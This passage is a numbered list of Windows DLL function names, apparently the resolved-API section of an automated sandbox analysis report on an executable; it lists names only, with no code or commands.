1146. "kernel32.dll.FreeEnvironmentStringsA",
1147. "kernel32.dll.UnhandledExceptionFilter",
1148. "kernel32.dll.GetFileType",
1149. "kernel32.dll.SetStdHandle",
1150. "kernel32.dll.GetACP",
1151. "kernel32.dll.HeapSize",
1152. "kernel32.dll.RaiseException",
1153. "kernel32.dll.GetLocalTime",
1154. "kernel32.dll.GetSystemTime",
1155. "kernel32.dll.RtlUnwind",
1156. "kernel32.dll.GetStartupInfoA",
1157. "kernel32.dll.GetOEMCP",
1158. "kernel32.dll.GetCPInfo",
1159. "kernel32.dll.GetProcessVersion",
1160. "kernel32.dll.SetErrorMode",
1161. "kernel32.dll.GlobalFlags",
1162. "kernel32.dll.GetCurrentThread",
1163. "kernel32.dll.GetFileTime",
1164. "kernel32.dll.TlsGetValue",
1165. "kernel32.dll.LocalReAlloc",
1166. "kernel32.dll.TlsSetValue",
1167. "kernel32.dll.TlsFree",
1168. "kernel32.dll.GlobalHandle",
1169. "kernel32.dll.TlsAlloc",
1170. "kernel32.dll.LocalAlloc",
1171. "kernel32.dll.lstrcmpA",
1172. "kernel32.dll.GlobalGetAtomNameA",
1173. "kernel32.dll.GlobalAddAtomA",
1174. "kernel32.dll.GlobalFindAtomA",
1175. "kernel32.dll.GlobalDeleteAtom",
1176. "kernel32.dll.lstrcmpiA",
1177. "kernel32.dll.SetEndOfFile",
1178. "kernel32.dll.UnlockFile",
1179. "kernel32.dll.LockFile",
1180. "kernel32.dll.FlushFileBuffers",
1181. "kernel32.dll.DuplicateHandle",
1182. "kernel32.dll.lstrcpynA",
1183. "kernel32.dll.FileTimeToLocalFileTime",
1184. "kernel32.dll.LocalFree",
1185. "kernel32.dll.InterlockedDecrement",
1186. "kernel32.dll.InterlockedIncrement",
1187. "kernel32.dll.WaitForMultipleObjects",
1188. "kernel32.dll.CreateFileA",
1189. "kernel32.dll.SetEvent",
1190. "kernel32.dll.FindResourceA",
1191. "kernel32.dll.LoadResource",
1192. "kernel32.dll.LockResource",
1193. "kernel32.dll.ReadFile",
1194. "kernel32.dll.CloseHandle",
1195. "kernel32.dll.WaitForSingleObject",
1196. "kernel32.dll.CreateProcessA",
1197. "kernel32.dll.GetTickCount",
1198. "kernel32.dll.GetCommandLineA",
1199. "kernel32.dll.MulDiv",
1200. "kernel32.dll.GetProcAddress",
1201. "kernel32.dll.GetModuleHandleA",
1202. "kernel32.dll.GetVolumeInformationA",
1203. "kernel32.dll.SetCurrentDirectoryA",
1204. "kernel32.dll.CreateDirectoryA",
1205. "kernel32.dll.CopyFileA",
1206. "kernel32.dll.DeleteFileA",
1207. "kernel32.dll.lstrlenW",
1208. "kernel32.dll.RemoveDirectoryA",
1209. "kernel32.dll.GetModuleFileNameA",
1210. "kernel32.dll.GetCurrentThreadId",
1211. "kernel32.dll.ExitProcess",
1212. "kernel32.dll.GlobalSize",
1213. "kernel32.dll.GlobalFree",
1214. "kernel32.dll.DeleteCriticalSection",
1215. "kernel32.dll.InitializeCriticalSection",
1216. "kernel32.dll.lstrcatA",
1217. "kernel32.dll.lstrlenA",
1218. "kernel32.dll.WinExec",
1219. "kernel32.dll.lstrcpyA",
1220. "kernel32.dll.FindNextFileA",
1221. "kernel32.dll.GlobalReAlloc",
1222. "kernel32.dll.HeapFree",
1223. "kernel32.dll.HeapReAlloc",
1224. "kernel32.dll.GetProcessHeap",
1225. "kernel32.dll.HeapAlloc",
1226. "kernel32.dll.GetUserDefaultLCID",
1227. "kernel32.dll.GetFullPathNameA",
1228. "kernel32.dll.FreeLibrary",
1229. "kernel32.dll.LoadLibraryA",
1230. "kernel32.dll.GetLastError",
1231. "kernel32.dll.GetVersionExA",
1232. "kernel32.dll.WritePrivateProfileStringA",
1233. "kernel32.dll.CreateThread",
1234. "kernel32.dll.CreateEventA",
1235. "kernel32.dll.Sleep",
1236. "kernel32.dll.GlobalAlloc",
1237. "kernel32.dll.GlobalLock",
1238. "kernel32.dll.GlobalUnlock",
1239. "kernel32.dll.GetTempPathA",
1240. "kernel32.dll.FindFirstFileA",
1241. "kernel32.dll.FindClose",
1242. "kernel32.dll.SetFileAttributesA",
1243. "kernel32.dll.GetFileAttributesA",
1244. "kernel32.dll.MoveFileA",
1245. "kernel32.dll.IsBadReadPtr",
1246. "advapi32.dll.RegQueryValueA",
1247. "advapi32.dll.RegSetValueExA",
1248. "advapi32.dll.RegOpenKeyExA",
1249. "advapi32.dll.RegCloseKey",
1250. "advapi32.dll.RegCreateKeyExA",
1251. "comctl32.dll.ImageList_Destroy",
1252. "comctl32.dll.#17",
1253. "comdlg32.dll.ChooseColorA",
1254. "comdlg32.dll.GetOpenFileNameA",
1255. "comdlg32.dll.GetFileTitleA",
1256. "comdlg32.dll.GetSaveFileNameA",
1257. "gdi32.dll.Escape",
1258. "gdi32.dll.ExtTextOutA",
1259. "gdi32.dll.TextOutA",
1260. "gdi32.dll.RectVisible",
1261. "gdi32.dll.PtVisible",
1262. "gdi32.dll.GetViewportExtEx",
1263. "gdi32.dll.ExtSelectClipRgn",
1264. "gdi32.dll.LineTo",
1265. "gdi32.dll.MoveToEx",
1266. "gdi32.dll.ExcludeClipRect",
1267. "gdi32.dll.GetClipBox",
1268. "gdi32.dll.ScaleWindowExtEx",
1269. "gdi32.dll.SetWindowExtEx",
1270. "gdi32.dll.GetTextMetricsA",
1271. "gdi32.dll.SetStretchBltMode",
1272. "gdi32.dll.GetClipRgn",
1273. "gdi32.dll.CreatePolygonRgn",
1274. "gdi32.dll.SelectClipRgn",
1275. "gdi32.dll.DeleteObject",
1276. "gdi32.dll.CreateDIBitmap",
1277. "gdi32.dll.GetSystemPaletteEntries",
1278. "gdi32.dll.CreatePalette",
1279. "gdi32.dll.StretchBlt",
1280. "gdi32.dll.SelectPalette",
1281. "gdi32.dll.RealizePalette",
1282. "gdi32.dll.GetDIBits",
1283. "gdi32.dll.GetWindowExtEx",
1284. "gdi32.dll.GetViewportOrgEx",
1285. "gdi32.dll.GetWindowOrgEx",
1286. "gdi32.dll.BeginPath",
1287. "gdi32.dll.EndPath",
1288. "gdi32.dll.PathToRegion",
1289. "gdi32.dll.CreateEllipticRgn",
1290. "gdi32.dll.CreateRoundRectRgn",
1291. "gdi32.dll.GetTextColor",
1292. "gdi32.dll.GetBkMode",
1293. "gdi32.dll.GetBkColor",
1294. "gdi32.dll.GetROP2",
1295. "gdi32.dll.GetStretchBltMode",
1296. "gdi32.dll.GetPolyFillMode",
1297. "gdi32.dll.CreateCompatibleBitmap",
1298. "gdi32.dll.CreateDCA",
1299. "gdi32.dll.CreateBitmap",
1300. "gdi32.dll.SelectObject",
1301. "gdi32.dll.CreatePen",
1302. "gdi32.dll.PatBlt",
1303. "gdi32.dll.CombineRgn",
1304. "gdi32.dll.CreateRectRgn",
1305. "gdi32.dll.FillRgn",
1306. "gdi32.dll.CreateSolidBrush",
1307. "gdi32.dll.CreateFontIndirectA",
1308. "gdi32.dll.GetStockObject",
1309. "gdi32.dll.GetObjectA",
1310. "gdi32.dll.EndPage",
1311. "gdi32.dll.EndDoc",
1312. "gdi32.dll.DeleteDC",
1313. "gdi32.dll.StartDocA",
1314. "gdi32.dll.StartPage",
1315. "gdi32.dll.BitBlt",
1316. "gdi32.dll.CreateCompatibleDC",
1317. "gdi32.dll.Ellipse",
1318. "gdi32.dll.Rectangle",
1319. "gdi32.dll.LPtoDP",
1320. "gdi32.dll.DPtoLP",
1321. "gdi32.dll.GetCurrentObject",
1322. "gdi32.dll.RoundRect",
1323. "gdi32.dll.GetTextExtentPoint32A",
1324. "gdi32.dll.GetDeviceCaps",
1325. "gdi32.dll.CreateRectRgnIndirect",
1326. "gdi32.dll.SetBkColor",
1327. "gdi32.dll.SaveDC",
1328. "gdi32.dll.RestoreDC",
1329. "gdi32.dll.SetBkMode",
1330. "gdi32.dll.SetPolyFillMode",
1331. "gdi32.dll.SetROP2",
1332. "gdi32.dll.SetTextColor",
1333. "gdi32.dll.SetMapMode",
1334. "gdi32.dll.SetViewportOrgEx",
1335. "gdi32.dll.OffsetViewportOrgEx",
1336. "gdi32.dll.SetViewportExtEx",
1337. "gdi32.dll.ScaleViewportExtEx",
1338. "gdi32.dll.SetWindowOrgEx",
1339. "iphlpapi.dll.GetAdaptersInfo",
1340. "ole32.dll.CLSIDFromProgID",
1341. "ole32.dll.OleRun",
1342. "ole32.dll.CoCreateInstance",
1343. "ole32.dll.CLSIDFromString",
1344. "ole32.dll.OleUninitialize",
1345. "ole32.dll.OleInitialize",
1346. "oleaut32.dll.#23",
1347. "oleaut32.dll.#25",
1348. "oleaut32.dll.#11",
1349. "oleaut32.dll.#8",
1350. "oleaut32.dll.#2",
1351. "oleaut32.dll.#16",
1352. "oleaut32.dll.#15",
1353. "oleaut32.dll.#26",
1354. "oleaut32.dll.#163",
1355. "oleaut32.dll.#165",
1356. "oleaut32.dll.#24",
1357. "oleaut32.dll.#17",
1358. "oleaut32.dll.#20",
1359. "oleaut32.dll.#19",
1360. "oleaut32.dll.#12",
1361. "oleaut32.dll.#9",
1362. "oleaut32.dll.#161",
1363. "oleaut32.dll.#186",
1364. "oleaut32.dll.#10",
1365. "rasapi32.dll.RasHangUpA",
1366. "rasapi32.dll.RasGetConnectStatusA",
1367. "shell32.dll.SHGetSpecialFolderPathA",
1368. "shell32.dll.Shell_NotifyIconA",
1369. "shell32.dll.ShellExecuteA",
1370. "user32.dll.WaitForInputIdle",
1371. "user32.dll.GetClipboardData",
1372. "user32.dll.OpenClipboard",
1373. "user32.dll.wsprintfA",
1374. "user32.dll.CloseClipboard",
1375. "user32.dll.EqualRect",
1376. "user32.dll.SetClipboardData",
1377. "user32.dll.EmptyClipboard",
1378. "user32.dll.GetSystemMetrics",
1379. "user32.dll.GetCursorPos",
1380. "user32.dll.MessageBoxA",
1381. "user32.dll.GetSysColorBrush",
1382. "user32.dll.GetWindowTextA",
1383. "user32.dll.GetDlgItem",
1384. "user32.dll.FindWindowA",
1385. "user32.dll.GetWindowThreadProcessId",
1386. "user32.dll.GetClassNameA",
1387. "user32.dll.GetDesktopWindow",
1388. "user32.dll.GetForegroundWindow",
1389. "user32.dll.SetWindowTextA",
1390. "user32.dll.LoadIconA",
1391. "user32.dll.TranslateMessage",
1392. "user32.dll.DrawFrameControl",
1393. "user32.dll.DrawEdge",
1394. "user32.dll.DrawFocusRect",
1395. "user32.dll.WindowFromPoint",
1396. "user32.dll.GetMessageA",
1397. "user32.dll.DispatchMessageA",
1398. "user32.dll.SetRectEmpty",
1399. "user32.dll.RegisterClipboardFormatA",
1400. "user32.dll.CreateIconFromResourceEx",
1401. "user32.dll.CreateIconFromResource",
1402. "user32.dll.DrawIconEx",
1403. "user32.dll.CreatePopupMenu",
1404. "user32.dll.AppendMenuA",
1405. "user32.dll.ModifyMenuA",
1406. "user32.dll.CreateMenu",
1407. "user32.dll.CreateAcceleratorTableA",
1408. "user32.dll.GetDlgCtrlID",
1409. "user32.dll.LoadStringA",
1410. "user32.dll.GetMenuCheckMarkDimensions",
1411. "user32.dll.GetMenuState",
1412. "user32.dll.SetMenuItemBitmaps",
1413. "user32.dll.CheckMenuItem",
1414. "user32.dll.MoveWindow",
1415. "user32.dll.IsDialogMessageA",
1416. "user32.dll.ScrollWindowEx",
1417. "user32.dll.SendDlgItemMessageA",
1418. "user32.dll.MapWindowPoints",
1419. "user32.dll.AdjustWindowRectEx",
1420. "user32.dll.GetScrollPos",
1421. "user32.dll.RegisterClassA",
1422. "user32.dll.GetMenuItemCount",
1423. "user32.dll.GetMenuItemID",
1424. "user32.dll.CreateWindowExA",
1425. "user32.dll.SetWindowsHookExA",
1426. "user32.dll.CallNextHookEx",
1427. "user32.dll.GetClassLongA",
1428. "user32.dll.SetPropA",
1429. "user32.dll.UnhookWindowsHookEx",
1430. "user32.dll.GetPropA",
1431. "user32.dll.CallWindowProcA",
1432. "user32.dll.GetSubMenu",
1433. "user32.dll.EnableMenuItem",
1434. "user32.dll.ClientToScreen",
1435. "user32.dll.EnumDisplaySettingsA",
1436. "user32.dll.LoadImageA",
1437. "user32.dll.SystemParametersInfoA",
1438. "user32.dll.ShowWindow",
1439. "user32.dll.IsWindowEnabled",
1440. "user32.dll.TranslateAcceleratorA",
1441. "user32.dll.GetKeyState",
1442. "user32.dll.CopyAcceleratorTableA",
1443. "user32.dll.PostQuitMessage",
1444. "user32.dll.IsZoomed",
1445. "user32.dll.GetClassInfoA",
1446. "user32.dll.DefWindowProcA",
1447. "user32.dll.GetMenu",
1448. "user32.dll.SetMenu",
1449. "user32.dll.PeekMessageA",
1450. "user32.dll.IsIconic",
1451. "user32.dll.SetFocus",
1452. "user32.dll.GetActiveWindow",
1453. "user32.dll.GetWindow",
1454. "user32.dll.DestroyAcceleratorTable",
1455. "user32.dll.SetWindowRgn",
1456. "user32.dll.GetMessagePos",
1457. "user32.dll.ScreenToClient",
1458. "user32.dll.ChildWindowFromPointEx",
1459. "user32.dll.CopyRect",
1460. "user32.dll.LoadBitmapA",
1461. "user32.dll.WinHelpA",
1462. "user32.dll.KillTimer",
1463. "user32.dll.SetTimer",
1464. "user32.dll.ReleaseCapture",
1465. "user32.dll.GetCapture",
1466. "user32.dll.SetCapture",
1467. "user32.dll.GetScrollRange",
1468. "user32.dll.SetScrollRange",
1469. "user32.dll.SetScrollPos",
1470. "user32.dll.SetRect",
1471. "user32.dll.InflateRect",
1472. "user32.dll.IntersectRect",
1473. "user32.dll.DestroyIcon",
1474. "user32.dll.PtInRect",
1475. "user32.dll.OffsetRect",
1476. "user32.dll.IsWindowVisible",
1477. "user32.dll.EnableWindow",
1478. "user32.dll.RedrawWindow",
1479. "user32.dll.GetWindowLongA",
1480. "user32.dll.SetWindowLongA",
1481. "user32.dll.GetSysColor",
1482. "user32.dll.SetActiveWindow",
1483. "user32.dll.SetCursorPos",
1484. "user32.dll.LoadCursorA",
1485. "user32.dll.SetCursor",
1486. "user32.dll.GetDC",
1487. "user32.dll.FillRect",
1488. "user32.dll.IsRectEmpty",
1489. "user32.dll.ReleaseDC",
1490. "user32.dll.IsChild",
1491. "user32.dll.DestroyMenu",
1492. "user32.dll.SetForegroundWindow",
1493. "user32.dll.GetWindowRect",
1494. "user32.dll.UnregisterClassA",
1495. "user32.dll.UpdateWindow",
1496. "user32.dll.ValidateRect",
1497. "user32.dll.InvalidateRect",
1498. "user32.dll.GetClientRect",
1499. "user32.dll.GetFocus",
1500. "user32.dll.GetParent",
1501. "user32.dll.GetTopWindow",
1502. "user32.dll.PostMessageA",
1503. "user32.dll.IsWindow",
1504. "user32.dll.SetParent",
1505. "user32.dll.DestroyCursor",
1506. "user32.dll.SendMessageA",
1507. "user32.dll.SetWindowPos",
1508. "user32.dll.GetWindowTextLengthA",
1509. "user32.dll.CharUpperA",
1510. "user32.dll.GetWindowDC",
1511. "user32.dll.BeginPaint",
1512. "user32.dll.EndPaint",
1513. "user32.dll.TabbedTextOutA",
1514. "user32.dll.DrawTextA",
1515. "user32.dll.GrayStringA",
1516. "user32.dll.DestroyWindow",
1517. "user32.dll.CreateDialogIndirectParamA",
1518. "user32.dll.EndDialog",
1519. "user32.dll.GetNextDlgTabItem",
1520. "user32.dll.GetWindowPlacement",
1521. "user32.dll.RegisterWindowMessageA",
1522. "user32.dll.GetLastActivePopup",
1523. "user32.dll.GetMessageTime",
1524. "user32.dll.RemovePropA",
1525. "version.dll.GetFileVersionInfoA",
1526. "version.dll.VerQueryValueA",
1527. "version.dll.VerLanguageNameA",
1528. "version.dll.GetFileVersionInfoSizeA",
1529. "wininet.dll.InternetCanonicalizeUrlA",
1530. "wininet.dll.InternetCrackUrlA",
1531. "wininet.dll.HttpOpenRequestA",
1532. "wininet.dll.HttpSendRequestA",
1533. "wininet.dll.HttpQueryInfoA",
1534. "wininet.dll.InternetReadFile",
1535. "wininet.dll.InternetConnectA",
1536. "wininet.dll.InternetSetOptionA",
1537. "wininet.dll.InternetCloseHandle",
1538. "wininet.dll.InternetOpenA",
1539. "winmm.dll.midiStreamRestart",
1540. "winmm.dll.midiStreamClose",
1541. "winmm.dll.midiOutReset",
1542. "winmm.dll.midiStreamStop",
1543. "winmm.dll.waveOutUnprepareHeader",
1544. "winmm.dll.waveOutPrepareHeader",
1545. "winmm.dll.waveOutWrite",
1546. "winmm.dll.waveOutPause",
1547. "winmm.dll.waveOutReset",
1548. "winmm.dll.waveOutClose",
1549. "winmm.dll.midiStreamOut",
1550. "winmm.dll.midiOutPrepareHeader",
1551. "winmm.dll.midiStreamProperty",
1552. "winmm.dll.midiStreamOpen",
1553. "winmm.dll.midiOutUnprepareHeader",
1554. "winmm.dll.waveOutOpen",
1555. "winmm.dll.waveOutGetNumDevs",
1556. "winspool.drv.OpenPrinterA",
1557. "winspool.drv.DocumentPropertiesA",
1558. "winspool.drv.ClosePrinter",
1559. "ws2_32.dll.#18",
1560. "ws2_32.dll.#116",
1561. "ws2_32.dll.#115",
1562. "ws2_32.dll.#52",
1563. "ws2_32.dll.#12",
1564. "ws2_32.dll.#11",
1565. "ws2_32.dll.#57",
1566. "ws2_32.dll.#19",
1567. "ws2_32.dll.#3",
1568. "ws2_32.dll.#101",
1569. "ws2_32.dll.#9",
1570. "ws2_32.dll.#2",
1571. "ws2_32.dll.#6",
1572. "ws2_32.dll.#15",
1573. "ws2_32.dll.#151",
1574. "ws2_32.dll.#1",
1575. "ws2_32.dll.#5",
1576. "ws2_32.dll.#13",
1577. "ws2_32.dll.#16",
1578. "ws2_32.dll.#8",
1579. "ws2_32.dll.#23",
1580. "ws2_32.dll.#4",
1581. "ws2_32.dll.#10",
1582. "ws2_32.dll.#20",
1583. "ws2_32.dll.#17",
1584. "kernel32.dll.IsProcessorFeaturePresent",
1585. "cryptbase.dll.SystemFunction036",
1586. "dwmapi.dll.DwmIsCompositionEnabled",
1587. "kernel32.dll.GetNativeSystemInfo",
1588. "kernel32.dll.Wow64DisableWow64FsRedirection",
1589. "advapi32.dll.RegDisableReflectionKey",
1590. "advapi32.dll.RegQueryValueExA",
1591. "advapi32.dll.RegEnableReflectionKey",
1592. "kernel32.dll.Wow64RevertWow64FsRedirection",
1593. "advapi32.dll.CryptAcquireContextA",
1594. "cryptsp.dll.CryptAcquireContextA",
1595. "advapi32.dll.CryptCreateHash",
1596. "cryptsp.dll.CryptCreateHash",
1597. "advapi32.dll.CryptHashData",
1598. "cryptsp.dll.CryptHashData",
1599. "advapi32.dll.CryptGetHashParam",
1600. "cryptsp.dll.CryptGetHashParam",
1601. "advapi32.dll.CryptDestroyHash",
1602. "cryptsp.dll.CryptDestroyHash",
1603. "advapi32.dll.CryptReleaseContext",
1604. "cryptsp.dll.CryptReleaseContext",
1605. "kernel32.dll.GetComputerNameA",
1606. "advapi32.dll.OpenSCManagerA",
1607. "advapi32.dll.OpenServiceA",
1608. "advapi32.dll.CloseServiceHandle",
1609. "ntdll.dll.RtlAdjustPrivilege",
1610. "kernel32.dll.InterlockedCompareExchange",
1611. "oleaut32.dll.#500",
1612. "kernel32.dll.SetThreadUILanguage",
1613. "kernel32.dll.CopyFileExW",
1614. "kernel32.dll.IsDebuggerPresent",
1615. "kernel32.dll.SetConsoleInputExeNameW",
1616. "kernel32.dll.SortGetHandle",
1617. "kernel32.dll.SortCloseHandle",
1618. "mswsock.dll.WSPStartup",
1619. "wshtcpip.dll.WSHOpenSocket",
1620. "wshtcpip.dll.WSHOpenSocket2",
1621. "wshtcpip.dll.WSHJoinLeaf",
1622. "wshtcpip.dll.WSHNotify",
1623. "wshtcpip.dll.WSHGetSocketInformation",
1624. "wshtcpip.dll.WSHSetSocketInformation",
1625. "wshtcpip.dll.WSHGetSockaddrType",
1626. "wshtcpip.dll.WSHGetWildcardSockaddr",
1627. "wshtcpip.dll.WSHGetBroadcastSockaddr",
1628. "wshtcpip.dll.WSHAddressToString",
1629. "wshtcpip.dll.WSHStringToAddress",
1630. "wshtcpip.dll.WSHIoctl",
1631. "advapi32.dll.StartServiceCtrlDispatcherA",
1632. "advapi32.dll.CreateServiceA",
1633. "kernel32.dll.lstrcpyn",
1634. "advapi32.dll.ChangeServiceConfig2A",
1635. "advapi32.dll.StartServiceA",
1636. "advapi32.dll.QueryServiceStatus",
1637. "advapi32.dll.RegisterServiceCtrlHandlerA",
1638. "advapi32.dll.SetServiceStatus",
1639. "rasapi32.dll.RasConnectionNotificationW",
1640. "sechost.dll.NotifyServiceStatusChangeA",
1641. "ole32.dll.CoInitializeEx",
1642. "advapi32.dll.RegDeleteTreeA",
1643. "advapi32.dll.RegDeleteTreeW",
1644. "ole32.dll.CoTaskMemAlloc",
1645. "oleaut32.dll.DllGetClassObject",
1646. "oleaut32.dll.DllCanUnloadNow",
1647. "advapi32.dll.RegOpenKeyW",
1648. "ole32.dll.CoTaskMemFree",
1649. "ole32.dll.StringFromIID",
1650. "iphlpapi.dll.GetAdaptersAddresses",
1651. "dhcpcsvc.dll.DhcpRequestParams",
1652. "oleaut32.dll.#6",
1653. "advapi32.dll.ChangeServiceConfigA",
1654. "ole32.dll.CoUninitialize",
1655. "kernel32.dll.GetSystemWow64DirectoryA",
1656. "ntdll.dll.ZwResumeProcess",
1657. "shlwapi.dll.PathRemoveBlanksA",
1658. "psapi.dll.GetProcessImageFileNameA",
1659. "kernel32.dll.GetLogicalDriveStringsA",
1660. "kernel32.dll.QueryDosDeviceA",
1661. "kernel32.dll.GetSystemInfo",
1662. "ntdll.dll.NtWow64QueryInformationProcess64",
1663. "ntdll.dll.NtWow64ReadVirtualMemory64",
1664. "psapi.dll.EmptyWorkingSet",
1665. "iphlpapi.dll.GetExtendedTcpTable",
1666. "kernel32.dll.InitializeProcThreadAttributeList",
1667. "kernel32.dll.RtlMoveMemory",
1668. "kernel32.dll.UpdateProcThreadAttribute",
1669. "advapi32.dll.CreateProcessAsUserA",
1670. "kernel32.dll.DeleteProcThreadAttributeList",
1671. "winhttp.dll.WinHttpOpen",
1672. "winhttp.dll.WinHttpSetTimeouts",
1673. "winhttp.dll.WinHttpSetOption",
1674. "winhttp.dll.WinHttpCrackUrl",
1675. "shlwapi.dll.StrCmpNW",
1676. "winhttp.dll.WinHttpConnect",
1677. "winhttp.dll.WinHttpOpenRequest",
1678. "winhttp.dll.WinHttpGetDefaultProxyConfiguration",
1679. "winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser",
1680. "kernel32.dll.SetPriorityClass",
1681. "nsi.dll.NsiAllocateAndGetTable",
1682. "cfgmgr32.dll.CM_Open_Class_Key_ExW",
1683. "iphlpapi.dll.ConvertInterfaceGuidToLuid",
1684. "iphlpapi.dll.GetIfEntry2",
1685. "iphlpapi.dll.GetIpForwardTable2",
1686. "iphlpapi.dll.GetIpNetEntry2",
1687. "iphlpapi.dll.FreeMibTable",
1688. "nsi.dll.NsiFreeTable",
1689. "winhttp.dll.WinHttpGetProxyForUrl",
1690. "winhttp.dll.WinHttpSendRequest",
1691. "ws2_32.dll.GetAddrInfoW",
1692. "ws2_32.dll.WSASocketW",
1693. "ws2_32.dll.#21",
1694. "ws2_32.dll.WSAIoctl",
1695. "ws2_32.dll.FreeAddrInfoW",
1696. "ws2_32.dll.WSARecv",
1697. "ws2_32.dll.WSASend",
1698. "winhttp.dll.WinHttpReceiveResponse",
1699. "winhttp.dll.WinHttpQueryHeaders",
1700. "shlwapi.dll.StrStrIW",
1701. "winhttp.dll.WinHttpQueryDataAvailable",
1702. "winhttp.dll.WinHttpReadData",
1703. "sechost.dll.LookupAccountNameLocalW",
1704. "rasmontr.dll.InitHelperDll",
1705. "nshwfp.dll.InitHelperDll",
1706. "dhcpcmonitor.dll.InitHelperDll",
1707. "wshelper.dll.InitHelperDll",
1708. "nshhttp.dll.InitHelperDll",
1709. "fwcfg.dll.InitHelperDll",
1710. "authfwcfg.dll.InitHelperDll",
1711. "ifmon.dll.InitHelperDll",
1712. "netiohlp.dll.InitHelperDll",
1713. "whhelper.dll.InitHelperDll",
1714. "hnetmon.dll.InitHelperDll",
1715. "rpcnsh.dll.InitHelperDll",
1716. "dot3cfg.dll.InitHelperDll",
1717. "napmontr.dll.InitHelperDll",
1718. "nshipsec.dll.InitHelperDll",
1719. "p2pnetsh.dll.InitHelperDll",
1720. "wlancfg.dll.InitHelperDll",
1721. "peerdistsh.dll.InitHelperDll",
1722. "cryptsp.dll.CryptEnumProvidersW",
1723. "user32.dll.LoadStringW",
1724. "advapi32.dll.RegCreateKeyExW",
1725. "advapi32.dll.RegOpenKeyExW",
1726. "sechost.dll.OpenSCManagerW",
1727. "sechost.dll.OpenServiceW",
1728. "sechost.dll.QueryServiceConfigW",
1729. "sechost.dll.CloseServiceHandle",
1730. "sechost.dll.QueryServiceStatus",
1731. "advapi32.dll.RegQueryInfoKeyW",
1732. "advapi32.dll.RegEnumKeyExW",
1733. "advapi32.dll.LookupAccountSidW",
1734. "sechost.dll.LookupAccountSidLocalW",
1735. "cryptsp.dll.CryptAcquireContextW",
1736. "cryptsp.dll.CryptGenRandom",
1737. "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
1738. "httpapi.dll.HttpInitialize",
1739. "userenv.dll.RegisterGPNotification",
1740. "userenv.dll.UnregisterGPNotification",
1741. "gpapi.dll.RegisterGPNotificationInternal",
1742. "bcryptprimitives.dll.GetHashInterface",
1743. "bcryptprimitives.dll.GetCipherInterface",
1744. "httpapi.dll.HttpTerminate",
1745. "gpapi.dll.UnregisterGPNotificationInternal",
1746. "comctl32.dll.#388",
1747. "ipsecsvc.dll.SpdServiceMain",
1748. "rpcrt4.dll.NdrClientCall3",
1749. "rpcrt4.dll.RpcBindingCreateW",
1750. "rpcrt4.dll.RpcBindingBind",
1751. "rpcrt4.dll.I_RpcMapWin32Status",
1752. "rpcrt4.dll.RpcBindingFree",
1753. "shfolder.dll.SHGetFolderPathA",
1754. "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
1755. "setupapi.dll.CM_Get_Device_Interface_List_ExW",
1756. "comctl32.dll.#332",
1757. "comctl32.dll.#386",
1758. "kernel32.dll.GetUserDefaultUILanguage",
1759. "shell32.dll.#680",
1760. "system.dll.Call",
1761. "kernel32.dll.IsWow64Process",
1762. "nsexec.dll.Exec",
1763. "kernel32.dll.Wow64EnableWow64FsRedirection",
1764. "advapi32.dll.DeleteService",
1765. "ole32.dll.CoRevokeInitializeSpy",
1766. "ole32.dll.NdrOleInitializeExtension",
1767. "ole32.dll.CoGetClassObject",
1768. "ole32.dll.CoGetMarshalSizeMax",
1769. "ole32.dll.CoMarshalInterface",
1770. "ole32.dll.CoUnmarshalInterface",
1771. "ole32.dll.CoGetPSClsid",
1772. "ole32.dll.CoReleaseMarshalData",
1773. "ole32.dll.DcomChannelSetHResult",
1774. "advapi32.dll.UnregisterTraceGuids",
1775. "comctl32.dll.#321",
1776. "rpcrt4.dll.I_RpcSNCHOption",
1777. "sechost.dll.ControlService",
1778. "sechost.dll.StartServiceW",
1779. "kernel32.dll.FlsAlloc",
1780. "kernel32.dll.FlsGetValue",
1781. "kernel32.dll.FlsSetValue",
1782. "kernel32.dll.FlsFree",
1783. "dbghelp.dll.SymFromAddr",
1784. "dbghelp.dll.SymInitialize",
1785. "wpcap.dll.pcap_close",
1786. "wpcap.dll.pcap_datalink",
1787. "wpcap.dll.pcap_dispatch",
1788. "wpcap.dll.pcap_findalldevs",
1789. "wpcap.dll.pcap_freealldevs",
1790. "wpcap.dll.pcap_lib_version",
1791. "wpcap.dll.pcap_lookupdev",
1792. "wpcap.dll.pcap_major_version",
1793. "wpcap.dll.pcap_minor_version",
1794. "wpcap.dll.pcap_open_live",
1795. "wpcap.dll.pcap_open_offline",
1796. "wpcap.dll.pcap_sendpacket",
1797. "wpcap.dll.pcap_next",
1798. "wpcap.dll.pcap_setdirection",
1799. "wpcap.dll.pcap_datalink_val_to_name",
1800. "wpcap.dll.pcap_perror",
1801. "wpcap.dll.pcap_sendqueue_alloc",
1802. "wpcap.dll.pcap_sendqueue_transmit",
1803. "wpcap.dll.pcap_sendqueue_destroy",
1804. "wpcap.dll.pcap_sendqueue_queue",
1805. "kernel32.dll.GetFullPathNameW",
1806. "kernel32.dll.GetTimeFormatW",
1807. "kernel32.dll.GetSystemTimeAsFileTime",
1808. "kernel32.dll.SystemTimeToFileTime",
1809. "kernel32.dll.GetDateFormatW",
1810. "kernel32.dll.RtlVirtualUnwind",
1811. "kernel32.dll.GetProcessId",
1812. "kernel32.dll.PurgeComm",
1813. "kernel32.dll.ClearCommError",
1814. "kernel32.dll.CreateRemoteThread",
1815. "kernel32.dll.CreateProcessW",
1816. "kernel32.dll.SetConsoleOutputCP",
1817. "kernel32.dll.GetConsoleOutputCP",
1818. "kernel32.dll.CreateFileMappingW",
1819. "kernel32.dll.UnmapViewOfFile",
1820. "kernel32.dll.MapViewOfFile",
1821. "kernel32.dll.WriteProcessMemory",
1822. "kernel32.dll.VirtualAllocEx",
1823. "kernel32.dll.VirtualProtectEx",
1824. "kernel32.dll.ReadProcessMemory",
1825. "kernel32.dll.VirtualFreeEx",
1826. "kernel32.dll.VirtualQueryEx",
1827. "kernel32.dll.VirtualQuery",
1828. "kernel32.dll.GetComputerNameExW",
1829. "kernel32.dll.DeviceIoControl",
1830. "kernel32.dll.ExpandEnvironmentStringsW",
1831. "kernel32.dll.FindNextFileW",
1832. "kernel32.dll.GetCurrentDirectoryW",
1833. "kernel32.dll.GetFileSizeEx",
1834. "kernel32.dll.GetFileAttributesW",
1835. "kernel32.dll.FindFirstFileW",
1836. "kernel32.dll.GetFileInformationByHandle",
1837. "kernel32.dll.GetCurrentDirectoryA",
1838. "kernel32.dll.GetTempFileNameA",
1839. "kernel32.dll.FileTimeToDosDateTime",
1840. "kernel32.dll.CreateFileW",
